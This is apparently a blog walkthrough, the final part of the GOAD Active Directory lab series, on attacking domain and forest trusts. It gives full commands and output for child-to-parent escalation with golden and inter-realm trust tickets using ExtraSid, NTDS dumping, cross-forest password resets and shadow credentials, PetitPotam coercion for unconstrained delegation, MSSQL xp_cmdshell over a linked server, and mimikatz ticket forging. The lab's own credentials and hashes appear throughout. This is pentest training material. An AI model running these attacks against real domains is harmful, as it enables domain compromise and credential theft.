
GOAD - part 12 - Trusts

In the previous post (Goad pwning part 11) we tried some attack paths with ACLs. This post covers escalation through a domain trust (from child to parent domain) and lateral movement across a forest-to-forest trust.

Forest trust exploitation has already been very well covered by harmj0y on this link; I recommend you read it :)

Goad upgrade

  • To simplify the trust exploitation in the lab I made some small changes.

  • A new group DragonRider on sevenkingdoms.local

sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook ad-data.yml -l dc01

  • Changed the AcrossTheNarrowSea group ACL to add GenericAll on dc01 (kingslanding)

sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook ad-acl.yml -l dc01

  • Added DragonRider as a member of the builtin Administrators group on dc01

sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook ad-relations.yml -l dc01

  • Enabled SID history on the sevenkingdoms trust link to essos by default

sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook vulnerabilities.yml -l dc01

The last one enables SID history on the trust; it amounts to the command shown here: trust_enable_sid_history_onkingslanding.png

Enumerate Trust

  • Let’s enumerate the trusts:

ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.10 trusts
ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.12 trusts

trusts_enum_ldeep.png

  • The sevenkingdoms to essos trust link is FOREST_TRANSITIVE | TREAT_AS_EXTERNAL because SID history is enabled on it
  • The essos to sevenkingdoms trust link is just FOREST_TRANSITIVE

  • The corresponding LDAP query is: (objectCategory=trustedDomain)
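To see what those flag names actually mean, here is an added example (not part of the GOAD lab nor of ldeep) that decodes the raw trustAttributes integer returned by the query above and flags the trusts that accept SID history. The flag values come from MS-ADTS; the 0x20 value used for the child/parent record is an assumption for the constructed sample.

```python
# Added example (not part of the GOAD lab or of ldeep): decode the raw trustAttributes
# value behind the ldeep output above (flag values from MS-ADTS, trustedDomain class)
# and flag the trusts that let SID history through, which the rest of the post relies on.
TRUST_ATTRIBUTES = {
    0x01: "NON_TRANSITIVE",
    0x02: "UPLEVEL_ONLY",
    0x04: "QUARANTINED_DOMAIN",   # SID filtering enforced (external trust default)
    0x08: "FOREST_TRANSITIVE",
    0x10: "CROSS_ORGANIZATION",
    0x20: "WITHIN_FOREST",        # child/parent or tree-root trust
    0x40: "TREAT_AS_EXTERNAL",    # forest trust with SID history enabled
    0x80: "USES_RC4_ENCRYPTION",
}
TRUST_DIRECTION = {1: "inbound", 2: "outbound", 3: "bidirectional"}

def decode_trust_attributes(value: int) -> list:
    """Flag names set in trustAttributes; bits above the low byte are kept as hex."""
    names = [name for bit, name in sorted(TRUST_ATTRIBUTES.items()) if value & bit]
    unknown = value & ~sum(TRUST_ATTRIBUTES)
    if unknown:
        names.append(f"0x{unknown:x}")
    return names

def sid_history_allowed(value: int) -> bool:
    """True when SIDs added by the trusted side survive SID filtering: inside a forest
    (no filtering), on a forest trust flagged TREAT_AS_EXTERNAL, or on an external
    trust without QUARANTINED_DOMAIN. Simplified reading, not the full MS-PAC rules."""
    if value & 0x20:
        return True
    if value & 0x08:
        return bool(value & 0x40)
    return not (value & 0x04)

def audit_trusts(trusts: list) -> list:
    """Return (name, direction, flags) for each trust record that accepts SID history.
    Records are dicts shaped like ldeep's JSON output."""
    findings = []
    for t in trusts:
        if sid_history_allowed(t["trustAttributes"]):
            flags = " | ".join(decode_trust_attributes(t["trustAttributes"]))
            findings.append((t["name"], TRUST_DIRECTION.get(t["trustDirection"], "?"), flags))
    return findings

# Constructed records mirroring the lab: each forest trust as seen from its own
# side, plus the intra-forest child/parent link (0x20 is assumed for that one).
LAB_TRUSTS = [
    {"name": "essos.local", "trustDirection": 3, "trustAttributes": 0x48},          # seen from sevenkingdoms
    {"name": "sevenkingdoms.local", "trustDirection": 3, "trustAttributes": 0x08},  # seen from essos
    {"name": "north.sevenkingdoms.local", "trustDirection": 3, "trustAttributes": 0x20},
]
```

Running audit_trusts(LAB_TRUSTS) reports the sevenkingdoms->essos link and the child/parent link, which are exactly the two trusts abused later in the post.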

  • We can observe this with BloodHound too (button "map domain trusts"):

MATCH p=(n:Domain)-->(m:Domain) RETURN p

trusts_bh_enum.png

  • We can see:
    • A domain bi-directional trust between north.sevenkingdoms.local and sevenkingdoms.local (Child / parent relation)
    • A forest bi-directional trust between essos.local and sevenkingdoms.local

Domain Trust - child/parent (north.sevenkingdoms.local -> sevenkingdoms.local)

  • Now imagine you have compromised the domain north.sevenkingdoms.local, dumped the NTDS and obtained the NT hashes of all the north domain users.

child_to_forest.png

As Microsoft says, the domain trust is not a security boundary.

RaiseMeUp - Escalate with impacket raiseChild

  • To escalate from child to parent, the simplest way is the impacket raiseChild.py script, which does all the work for us.

raiseChild.py north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'

trusts_domain_raisechild.png

  • This creates a golden ticket for the forest enterprise admins.
  • It then logs into the forest and gets the target info (default administrator, RID 500).
  • All the job is done with one command; if you are lazy you don’t even need to understand x)

Golden ticket + ExtraSid

  • We did the exploitation in one command with impacket raiseChild.py; now let’s do the same step by step and create the golden ticket ourselves.
  • A full explanation of the attack can be found here: https://adsecurity.org/?p=1640
  • First dump the krbtgt of the domain we own

# dump child ntds and get krbtgt NT hash
secretsdump -just-dc-user north/krbtgt \
 north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11

...
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:13354bc6e1b48fff8d66a2090e909b27:::
..

trusts_child_dcsync_krbtgt.png

  • Now get the child and parent domain SIDs

# dump child domain SID
lookupsid.py -domain-sids north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11 0

[*] Domain SID is: S-1-5-21-638448100-4005671799-261795860

# dump parent domain SID
lookupsid.py -domain-sids north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.10 0

[*] Domain SID is: S-1-5-21-1409754491-4246775990-3914137275
  • Then forge the golden ticket with the child krbtgt hash, adding the parent domain Enterprise Admins SID (RID 519) as an extra SID

ticketer.py -nthash 13354bc6e1b48fff8d66a2090e909b27 \
 -domain-sid S-1-5-21-638448100-4005671799-261795860 \
 -domain north.sevenkingdoms.local \
 -extra-sid S-1-5-21-1409754491-4246775990-3914137275-519 \
 goldenuser
  • And we use the ticket to dump the parent domain NTDS

secretsdump -k -no-pass -just-dc-ntlm \
 north.sevenkingdoms.local/goldenuser@kingslanding.sevenkingdoms.local

trusts_child_extrasid_golden.png

Trust ticket - forge inter-realm TGT

  • Another way to escalate from child to parent is to extract the trust key and use it to forge our own trust ticket (a very good explanation, with Mimikatz examples, can be found here: https://adsecurity.org/?p=1588)

  • The trust key can be found by targeting the NetBIOS name of the parent domain (the trust account) in the NTDS

secretsdump -just-dc-user 'SEVENKINGDOMS$' \
 north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11

trusts_key.png

  • Now that we have the trust key, we can forge the ticket just like we did with the krbtgt hash, but this time we set the SPN krbtgt/parent_domain

ticketer.py -nthash cef54bd576fc6054870d8d8cea5c069c \
 -domain-sid S-1-5-21-638448100-4005671799-261795860 \
 -domain north.sevenkingdoms.local \
 -extra-sid S-1-5-21-1409754491-4246775990-3914137275-519 \
 -spn krbtgt/sevenkingdoms.local trustfakeuser

trust_create_trust_ticket.png

  • Now we use the forged inter-realm TGT to ask for a service ticket (ST) on the parent domain

export KRB5CCNAME=/workspace/trusts/trustfakeuser.ccache
getST.py -k -no-pass -spn cifs/kingslanding.sevenkingdoms.local \
 sevenkingdoms.local/trustfakeuser@sevenkingdoms.local -debug

trust_trust_ticket_getst.png

  • And now we can use our service ticket :)
  • Connect with smbclient

export KRB5CCNAME=/workspace/trusts/trustfakeuser@sevenkingdoms.local@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache
smbclient.py -k -no-pass trustfakeuser@kingslanding.sevenkingdoms.local

trust_trust_ticket_smbclient.png

  • Or even dump secrets

secretsdump -k -no-pass -just-dc-ntlm trustfakeuser@kingslanding.sevenkingdoms.local

trust_trust_ticket_secretsdump.png

This technique even works if the krbtgt password has been changed twice, since it relies on the trust key rather than on the krbtgt hash!

Unconstrained delegation

  • As winterfell is a domain controller, by default it is configured with unconstrained delegation.
  • This attack from child to parent domain with unconstrained delegation was done in part 10 (delegations).
  • The principle is simple: coerce the parent DC to authenticate to an unconstrained delegation server and extract the TGT.

Forest Trust (sevenkingdoms.local -> essos.local)

  • We have done child to parent domain; in the next part we will try to exploit forest to forest.

forest_to_forest.png

Password reuse

  • In a real environment this is very relevant: dump the NTDS of the domain you own and try to find the same users on the external forest domains.
  • The lab doesn’t have this behavior, but it is really simple to exploit.

Foreign group and users

  • In BloodHound we can easily see that there are links between the domains with the following query (careful: this query is fine in a lab but will certainly be a little too heavy in a real-world AD)

MATCH p = (a:Domain)-[:Contains*1..]->(x)-->(w)-->(z)<--(y)<-[:Contains*1..]-(b:Domain) where (x:Container or x:OU) and (y:Container or y:OU) and (a.name <>b.name) and (tolower(w.samaccountname) <> "enterprise admins" and tolower(w.samaccountname) <> "enterprise key admins" and tolower(z.samaccountname) <> "enterprise admins" and tolower(z.samaccountname) <> "enterprise key admins")  RETURN p

trust_bloodhound.png

  • In the GOAD lab you will find some specific groups to pass from one domain to the other.

Note that BloodHound also has buttons to search foreign groups and users directly in the interface.

  • As you already did the ACL part previously, you will easily find the way to exploit that (shadow credentials / targeted kerberoasting / change password / …), but since it is cross-domain we will do the first :)

  • Sevenkingdoms to essos: group spys

trust_foreing_groups_spys.png

  • To do that, just pick a user from the small council (for example petyer.baelish:@littlefinger@) and exploit with the spys group

net rpc password jorah.mormont -U sevenkingdoms.local/petyer.baelish%@littlefinger@ -S meereen.essos.local
Enter new password for jorah.mormont: <here we enter P@ssword123>

  • And verify

cme smb 192.168.56.12 -u jorah.mormont -p 'P@ssword123' -d essos.local

trust_change_password_foreigngroup.png

  • We can also do that with shadow credentials (but the auto mode will not work here; we will have to do it in two steps)

certipy shadow add -u petyer.baelish@sevenkingdoms.local -p '@littlefinger@' \
 -dc-ip 192.168.56.12 -target meereen.essos.local -account 'jorah.mormont'

certipy auth -pfx jorah.mormont.pfx -username jorah.mormont -domain essos.local -dc-ip 192.168.56.12

trust_change_shadow_creds_cross_domain.png

  • Essos to sevenkingdoms: group accros_thenarrowsea

In the same way we can exploit the essos to sevenkingdoms foreign group

trust_foreing_groups_accros_thenarrowsea.png

Please note that Active Directory groups are not all the same. There are 3 types of security groups: https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups

  • Universal
  • Global
  • Domain Local

If a group contains members from a trusted domain, it has to be of type Domain Local.

Group scope information is well explained by harmj0y here

Use unconstrained delegation

  • From kingslanding we can rule the essos domain with unconstrained delegation

  • We connect to kingslanding with RDP as an administrator

xfreerdp /d:sevenkingdoms.local /u:cersei.lannister /p:'il0vejaime' /v:192.168.56.10 /size:80% /cert-ignore

  • For simplicity we will disable Defender
  • Now we launch Rubeus.exe to wait for a TGT of the essos forest.

.\Rubeus.exe monitor /filteruser:MEEREEN$ /interval:1

  • And we run PetitPotam from our Linux console to coerce meereen to authenticate to kingslanding.

petitpotam.py -u arya.stark -p Needle -d north.sevenkingdoms.local kingslanding.sevenkingdoms.local meereen.essos.local

  • And we get the TGT of meereen!

trust_forest_tgt_unconstrained.png

  • Now we can copy it to Linux (delete spaces and newlines)
  • Decode the base64 and save it to a kirbi file

base64 -d rubeus.b64 > meereen.kirbi

  • Convert it to ccache and use it to DCSync essos.local

ticketConverter.py meereen.kirbi meereen.ccache
export KRB5CCNAME=/workspace/trusts/unconstrained/meereen.ccache
secretsdump -k -no-pass -just-dc-ntlm essos.local/'MEEREEN$'@meereen.essos.local

trust_forest_tgt_unconstrained_finish.png

MSSQL trust link

  • The MSSQL trust link is across forests, so it can be used for forest-to-forest exploitation.
  • An example was done in part 7, but let’s redo it for fun:

  • Connect to the MSSQL DB as jon.snow

python3 mssqlclient.py -windows-auth north.sevenkingdoms.local/jon.snow:iknownothing@castelblack.north.sevenkingdoms.local

  • Enumerate the MSSQL linked servers

enum_links

trust_forest_mssql_enum.png

  • And now use the link from castelblack (north domain) to braavos (essos domain)

use_link BRAAVOS
enable_xp_cmdshell
xp_cmdshell whoami

  • Because the link uses sa as the remote login on braavos, we can enable xp_cmdshell and launch commands.

trust_forest_mssql_exec.png

Golden ticket with external forest, SID history ftw (essos -> sevenkingdoms)

This attack is only possible because SID history is enabled on the sevenkingdoms->essos trust

  • Find the domain SIDs with lookupsid.py
    • essos SID: S-1-5-21-2203133648-1386395927-1390703624
    • sevenkingdoms SID: S-1-5-21-1409754491-4246775990-3914137275
  • Like before, extract the krbtgt hash

secretsdump -just-dc-user 'essos/krbtgt' essos.local/daenerys.targaryen:'BurnThemAll!'@192.168.56.12
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e58cf01ba6cc645da9f7ab1f28fc3934:::
...

About SID filtering, dirkjanm says on his blog: “What this does mean for an attacker is that you can spoof any RID >1000 group if SID history is enabled across a Forest trust!”

  • The group dragonrider (RID 1132) is a perfect match (on a real audit, Exchange groups are usually a good target)
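To make the RID >1000 rule concrete, here is an added example (not from the GOAD lab nor from impacket) that models the SID filtering applied to the ExtraSids of a ticket crossing a trust, using the lab domain SIDs quoted in this post. It is a simplified model following the reading above, not the full MS-PAC/MS-ADTS filtering tables, and it shows why RID 519 crosses the child/parent trust while only RIDs >= 1000 cross the forest trust with SID history enabled.

```python
# Added example (not from the GOAD lab or impacket): simplified model of the SID
# filtering a trusting KDC applies to ExtraSids issued by a trusted domain. It
# follows the post's reading (within-forest: no filtering; cross-forest with SID
# history: foreign SIDs with RID >= 1000 only), not the full MS-PAC rules.
import re

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21(?:-\d+){3})-(\d+)$")

# Lab domain SIDs as quoted in the post.
ESSOS_SID = "S-1-5-21-2203133648-1386395927-1390703624"
SEVENKINGDOMS_SID = "S-1-5-21-1409754491-4246775990-3914137275"
NORTH_SID = "S-1-5-21-638448100-4005671799-261795860"

def split_sid(sid: str):
    """Return (domain_sid, rid) for a domain SID, or (None, None) for a
    well-known SID such as S-1-5-32-544, which is never accepted from a trust."""
    m = DOMAIN_SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else (None, None)

def extra_sid_survives(extra_sid: str, trusted_forest_domains: set,
                       within_forest: bool, sid_history_enabled: bool) -> bool:
    """Would the trusting KDC keep this ExtraSid sent by the trusted side?"""
    domain, rid = split_sid(extra_sid)
    if within_forest:
        return True                      # no SID filtering between child and parent
    if domain is None:
        return False                     # well-known / builtin SIDs are always dropped
    if domain in trusted_forest_domains:
        return True                      # SIDs the trusted forest legitimately owns
    # Foreign SID: only accepted as SID history, and then only with RID >= 1000,
    # so Domain Admins (512) and Enterprise Admins (519) stay filtered.
    return sid_history_enabled and rid >= 1000

def filter_extra_sids(extra_sids: list, trusted_forest_domains: set,
                      within_forest: bool, sid_history_enabled: bool) -> list:
    """Return the ExtraSids that would survive filtering, in order."""
    return [s for s in extra_sids
            if extra_sid_survives(s, trusted_forest_domains, within_forest, sid_history_enabled)]

if __name__ == "__main__":
    # child -> parent: Enterprise Admins (519) injected from north is kept
    print(filter_extra_sids([SEVENKINGDOMS_SID + "-519"], {NORTH_SID}, True, False))
    # essos -> sevenkingdoms forest trust with SID history: 1132 kept, 519 dropped
    print(filter_extra_sids([SEVENKINGDOMS_SID + "-1132", SEVENKINGDOMS_SID + "-519"],
                            {ESSOS_SID}, False, True))
```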

trust_dragonrider.png

  • Create the golden ticket for a fake user

ticketer.py -nthash e58cf01ba6cc645da9f7ab1f28fc3934 \
 -domain-sid S-1-5-21-2203133648-1386395927-1390703624 \
 -domain essos.local \
 -extra-sid S-1-5-21-1409754491-4246775990-3914137275-1132 \
 dragon

  • And use it (secretsdump will work too)

export KRB5CCNAME=/workspace/trusts/external/dragon.ccache
smbexec.py -k -no-pass dragon@kingslanding.sevenkingdoms.local -debug

trust_external_golden_exploit.png

Trust ticket with external forest (essos -> sevenkingdoms)

  • Exactly as we did before on the child/parent domain trust, we can do this on an external forest, but just like with the golden ticket we need SID history enabled to exploit it.

  • Find the domain SIDs with lookupsid.py

    • essos SID: S-1-5-21-2203133648-1386395927-1390703624
    • sevenkingdoms SID: S-1-5-21-1409754491-4246775990-3914137275

  • Extract the trust key (the SEVENKINGDOMS$ trust account)

secretsdump -just-dc-user 'SEVENKINGDOMS$' essos.local/daenerys.targaryen:'BurnThemAll!'@192.168.56.12
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:285b80ddc1ad529f27403804e75a9ab1:::
...

  • Create the inter-realm TGT

ticketer.py -nthash 285b80ddc1ad529f27403804e75a9ab1 \
 -domain-sid S-1-5-21-2203133648-1386395927-1390703624 \
 -domain essos.local \
 -extra-sid S-1-5-21-1409754491-4246775990-3914137275-1132 \
 -spn krbtgt/sevenkingdoms.local trustdragon

trust_external_trustticket1.png

  • Ask a service ticket for kingslanding cifs

export KRB5CCNAME=/workspace/trusts/external/trustdragon.ccache
getST.py -k -no-pass -spn cifs/kingslanding.sevenkingdoms.local \
 sevenkingdoms.local/trustdragon@sevenkingdoms.local -debug

trust_external_trustticket2.png

  • And enjoy (secretsdump will work too)

export KRB5CCNAME=/workspace/trusts/external/trustdragon@sevenkingdoms.local.ccache
smbexec.py -k -no-pass trustdragon@kingslanding.sevenkingdoms.local -debug

trust_external_trustticket3.png

Exploit ACL with external trust golden ticket

  • Now imagine we want to exploit this ACL from essos:

trust_external_acl.png

So far I haven’t found a nice way to do this from Linux, but from Windows it is pretty easy

  • Connect as administrator on meereen and disable the antivirus to be able to use mimikatz and PowerView
  • Create the golden ticket with mimikatz matching the group kingsguard (RID 1130)

mimikatz # kerberos::golden /user:guard /domain:essos.local /sid:S-1-5-21-2203133648-1386395927-1390703624 /krbtgt:e58cf01ba6cc645da9f7ab1f28fc3934 /sids:S-1-5-21-1409754491-4246775990-3914137275-1130 /ptt

trust_acl_mimi.png

trust_acl_golentgt.png

  • And now use PowerView to change stannis’ password

Import-Module .\powerview.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity stannis.baratheon -AccountPassword $SecPassword -Domain sevenkingdoms.local

trust_acl_changepassword.png

  • And it works!

trust_acl_changepassword_cme.png

  • And if we look at the created tickets with klist:
    • Server: krbtgt/essos.local @ essos.local (golden ticket)
    • Server: krbtgt/SEVENKINGDOMS.LOCAL @ ESSOS.LOCAL (kdc: meereen) (inter-realm TGT)
    • Server: ldap/kingslanding.sevenkingdoms.local @ SEVENKINGDOMS.LOCAL (kdc: kingslanding)
    • Server: ldap/kingslanding.sevenkingdoms.local/sevenkingdoms.local @ SEVENKINGDOMS.LOCAL (kdc: kingslanding)

The end - Winter is coming

  • The GOAD writeup series ends with this part. If you read it all you are very brave, and I hope you enjoyed it despite my terrible English ^^
  • I also hope you gave the lab a try and that everything is working fine on your computer.
  • For next year I have other evolutions of the lab, blog post ideas and projects in mind; you will see it on Twitter (@M4yFly) when something new comes out.
  • Again, thank you to all the security researchers and open-source contributors for all the work they do and share!

Resources

This post is licensed under CC BY 4.0 by the author.